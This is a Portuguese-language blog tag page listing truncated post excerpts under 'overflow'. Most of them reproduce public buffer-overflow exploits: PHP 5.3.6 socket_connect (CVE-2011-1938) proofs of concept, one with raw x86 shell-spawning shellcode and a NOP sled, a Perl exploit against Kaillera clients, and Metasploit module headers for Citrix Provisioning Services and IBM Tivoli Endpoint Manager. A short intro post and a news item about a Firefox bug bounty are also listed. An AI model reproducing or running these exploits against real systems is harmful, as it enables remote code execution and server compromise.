Skip to content
AppUnix

Tag: overflow

Segurança da Informação

03/01/2012 by little_oak

Segurança da Informação (parte 1) – Conceitos Mod NUB 1   Intitulo “mod nub 1” a este artigo pois o considero extremamente básico para quem está querendo se aprofundar em um assunto, que na verdade é um mundo (e olhe que não é novo) vasto, não completamente desvendado e ainda um ramo cujo grau de conhecimento …

Continue Reading

PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938

04/07/2011 by little_oak

/* ** Jonathan Salwan – @shell_storm ** http://shell-storm.org ** 2011-06-04 ** ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938 ** ** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c ** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary ** code via a long pathname for a UNIX socket. */ echo “[+] PHP 5.3.6 Buffer Overflow PoC …

Continue Reading

Kaillera Multiple Clients Buffer Overflow Vulnerabilities

30/06/2011 by little_oak

#!/usr/bin/perl # Exploit Title: Remote Buffer Overflows in Kaillera clients # Date: 6/30/11 # Author: sil3nt_dre4m # Software Link: Multiple: # 1.  Kaillera original client: An emulator to download with this client bundled with it is Project64K 0.13: http://www.zophar.net/download_file/1907 # 2.  Supraclient 0.85.2 CPPE : This client can be found here: http://morphus56k.110mb.com/website/downloads/SupraclientCPPE_v0.85.2.zip # 3.  Open …

Continue Reading

Citrix Provisioning Services 5.6 Overflow

28/06/2011 by little_oak

Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow   ## # $Id: citrix_streamprocess.rb 13042 2011-06-27 18:00:12Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. …

Continue Reading

IBM Tivoli Endpoint Manager POST Query Buffer Overflow

13/06/2011 by little_oak

Um pouquinho de overflow não faz mal para ninguém: ## # $Id: ibm_tivoli_endpoint_bof.rb 12925 2011-06-12 00:04:55Z bannedit $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of …

Continue Reading

PHP inferior ou igual a 5.3.5 socket_connect() Buffer Overflow Vulnerability

25/05/2011 by little_oak

<?php // Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian // Affected Versions: 5.3.3-5.3.6 echo “[+] CVE-2011-1938”; echo “[+] there we go…\n”; define(‘EVIL_SPACE_ADDR’, “\xff\xff\xee\xb3”); define(‘EVIL_SPACE_SIZE’, 1024*1024*8); $SHELLCODE = “\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0”. “\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1”. “\xcd\x80”; echo “[+] creating the sled.\n”; $CODE = str_repeat(“\x90”, EVIL_SPACE_SIZE); for ($i = 0, $j = EVIL_SPACE_SIZE – strlen($SHELLCODE) – 1 ; $i < strlen($SHELLCODE) …

Continue Reading

BLOG: Adolescente com 12 anos de idade ganha 3000 U$ da Mozilla por causa de Exploit

25/10/2010 by little_oak

Segundo matéria publicada, um garoto de 12 anos de idade conseguiu explorar uma vulnerabilidade junto ao FireFox (considerado por muitos um dos melhores navegadores de todos os tempos) com uso de exploit. A Mozilla, como é de praxe sempre bonifica seus desenvolvedores que reportam bugs, como foi o caso deste jovem. A matéria relata que …

Continue Reading

Pesquisa

Categorias

  • Blog
  • cPanel
  • How Tos
  • Linux
  • Mac Os
  • MySQL
  • Wordpress

#Apoiadores

Patrocinador

Registre-se e ganhe $25



© 2021 AppUnix | Protegido Por MxGuardDoG